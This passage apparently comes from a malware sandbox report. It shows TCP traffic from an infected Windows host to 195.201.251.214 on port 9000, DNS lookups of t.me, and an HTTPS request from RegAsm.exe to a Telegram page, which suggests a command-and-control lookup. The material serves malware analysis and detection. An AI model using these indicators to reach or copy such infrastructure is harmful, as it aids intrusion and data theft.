                                                  Jul 1, 2024 09:12:41.981633902 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.981643915 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.981657982 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.981683969 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.981713057 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.981738091 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.981760025 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.981774092 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.981784105 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.981808901 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.981837034 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.981908083 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.981950998 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.981970072 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982009888 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982009888 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982026100 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982037067 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982053041 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982074976 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982108116 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982117891 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982145071 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982160091 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982171059 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982523918 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982605934 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982620001 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982630968 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982640028 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982664108 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982701063 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982701063 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982712030 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982724905 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.982748032 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.982760906 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.998918056 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.998976946 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.998992920 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.999031067 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.999058008 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.999063969 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.999068975 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.999083042 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.999089956 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.999094963 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.999105930 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:41.999108076 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.999121904 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:41.999140978 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.001676083 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.001688004 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.001698971 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.001709938 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.001720905 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.001734018 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.001734972 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.001759052 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.001795053 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.004395962 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.004407883 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.004417896 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.004447937 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.004472017 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.004487991 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.004489899 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.004506111 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.004512072 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.004518986 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.004528999 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.004532099 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.004544973 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.004566908 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.005677938 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.005692959 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.005703926 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.005712986 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.005728960 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.005736113 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.005747080 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.005752087 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.005774975 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.005800009 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.036700010 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.036757946 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.036770105 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.036791086 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.036811113 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.037292004 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037337065 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037349939 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037360907 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037369013 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.037373066 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037406921 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.037435055 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.037736893 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037750959 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037763119 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037779093 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.037791967 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.037825108 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.038172007 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.038183928 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.038232088 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.044475079 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.044492006 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.044507980 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.044517994 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.044542074 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.044550896 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.044678926 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.044699907 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.044709921 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.044723034 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.044743061 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.044753075 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.045182943 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.045192957 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.045202017 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.045234919 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.045260906 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.045303106 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.045317888 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.045327902 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.045337915 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.045350075 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.045370102 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.045397997 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.046066999 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.046077967 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.046087980 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.046099901 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.046113968 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.046116114 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.046149969 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.046160936 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.133233070 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.133630991 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.139179945 CEST900049741195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.139260054 CEST497419000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.139338017 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:42.139400005 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.139708996 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:42.144927979 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.224030972 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.224503994 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.346843004 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.346956015 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.347084045 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.347328901 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.347352028 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.347366095 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.347491980 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.349397898 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.349479914 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.373519897 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.373577118 CEST900049742195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.373677969 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.373717070 CEST497429000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.374053955 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.374171019 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:43.384773970 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.384854078 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.384862900 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.384871960 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.384881020 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:43.396625996 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.047657967 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.047768116 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.048083067 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.049690962 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.049726009 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.053004026 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.054773092 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.054879904 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.054893970 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.140815973 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.140935898 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.239037991 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.239428997 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.244343042 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.244420052 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.244520903 CEST900049745195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.244570971 CEST497459000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.244669914 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.252818108 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.760189056 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.760268927 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.918219090 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.918338060 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.918709040 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.920514107 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:44.923659086 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:44.925400972 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.327114105 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.327506065 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.332350016 CEST900049747195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.332369089 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.332401991 CEST497479000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.332454920 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.332719088 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.337485075 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.744729042 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.744935036 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.987560987 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.987624884 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.988691092 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.991328955 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:45.993448019 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:45.996088982 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.367798090 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.368263960 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.373220921 CEST900049749195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.373238087 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.373284101 CEST497499000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.373322964 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.373573065 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:46.378309011 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.836754084 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:46.837467909 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.029063940 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.029134989 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.029573917 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.031255960 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.033107042 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.035072088 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.036894083 CEST900049752195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.036948919 CEST497529000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.038252115 CEST900049753195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.039406061 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.039642096 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.044492006 CEST900049753195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.693741083 CEST900049753195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.693805933 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.694147110 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.695693970 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.697083950 CEST497549000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.699074984 CEST900049753195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.700822115 CEST900049753195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.700872898 CEST497539000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.701921940 CEST900049754195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:47.701994896 CEST497549000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.702208996 CEST497549000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:47.708828926 CEST900049754195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:48.368089914 CEST900049754195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:48.368169069 CEST497549000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:48.368500948 CEST497549000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:48.370065928 CEST497549000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:48.371510983 CEST497559000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:48.373397112 CEST900049754195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:48.375324965 CEST900049754195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:48.375370979 CEST497549000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:48.377033949 CEST900049755195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:48.377095938 CEST497559000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:48.377286911 CEST497559000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:48.382636070 CEST900049755195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.023581982 CEST900049755195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.023638964 CEST497559000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.024029016 CEST497559000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.025700092 CEST497559000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.027532101 CEST497569000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.028832912 CEST900049755195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.030910015 CEST900049755195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.030960083 CEST497559000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.032361031 CEST900049756195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.032449961 CEST497569000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.032664061 CEST497569000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.037370920 CEST900049756195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.679316044 CEST900049756195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.679389954 CEST497569000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.679848909 CEST497569000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.681444883 CEST497569000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.683543921 CEST497579000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.684945107 CEST900049756195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.687619925 CEST900049756195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.687678099 CEST497569000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.688263893 CEST900049757195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:49.688324928 CEST497579000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.688505888 CEST497579000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:49.694685936 CEST900049757195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:50.340996027 CEST900049757195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:50.341078043 CEST497579000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:50.341456890 CEST497579000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:50.343116045 CEST497579000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:12:50.346227884 CEST900049757195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:50.348200083 CEST900049757195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:12:50.348263025 CEST497579000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:13:56.923229933 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:13:56.923239946 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:13:56.923249006 CEST900049751195.201.251.214192.168.2.4
                                                  Jul 1, 2024 09:13:56.923453093 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:14:11.036263943 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:14:11.036366940 CEST497519000192.168.2.4195.201.251.214
                                                  Jul 1, 2024 09:14:11.041358948 CEST900049751195.201.251.214192.168.2.4

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 1, 2024 09:12:21.091492891 CEST5753253192.168.2.41.1.1.1
                                                  Jul 1, 2024 09:12:22.091768026 CEST5753253192.168.2.41.1.1.1
                                                  Jul 1, 2024 09:12:23.097721100 CEST5753253192.168.2.41.1.1.1
                                                  Jul 1, 2024 09:12:25.113420010 CEST5753253192.168.2.41.1.1.1
                                                  Jul 1, 2024 09:12:29.131639004 CEST5753253192.168.2.41.1.1.1
                                                  Jul 1, 2024 09:12:29.281085968 CEST53575321.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jul 1, 2024 09:12:21.091492891 CEST192.168.2.41.1.1.10x44a0Standard query (0)t.meA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 09:12:22.091768026 CEST192.168.2.41.1.1.10x44a0Standard query (0)t.meA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 09:12:23.097721100 CEST192.168.2.41.1.1.10x44a0Standard query (0)t.meA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 09:12:25.113420010 CEST192.168.2.41.1.1.10x44a0Standard query (0)t.meA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 09:12:29.131639004 CEST192.168.2.41.1.1.10x44a0Standard query (0)t.meA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jul 1, 2024 09:12:28.937510014 CEST1.1.1.1192.168.2.40xadccNo error (0)windowsupdatebg.s.llnwi.net87.248.205.0A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 09:12:29.281085968 CEST1.1.1.1192.168.2.40x44a0No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 09:13:30.909853935 CEST1.1.1.1192.168.2.40xb1ebNo error (0)windowsupdatebg.s.llnwi.net87.248.205.0A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • t.me

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449729149.154.167.994437768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-01 07:12:30 UTC84OUTGET /g067n HTTP/1.1
                                                  Host: t.me
                                                  Connection: Keep-Alive
                                                  Cache-Control: no-cache
                                                  2024-07-01 07:12:30 UTC511INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Mon, 01 Jul 2024 07:12:30 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Content-Length: 12310
                                                  Connection: close
                                                  Set-Cookie: stel_ssid=978a8cba9b70c038b8_6505044929390746476; expires=Tue, 02 Jul 2024 07:12:30 GMT; path=/; samesite=None; secure; HttpOnly
                                                  Pragma: no-cache
                                                  Cache-control: no-store
                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                  Strict-Transport-Security: max-age=35768000
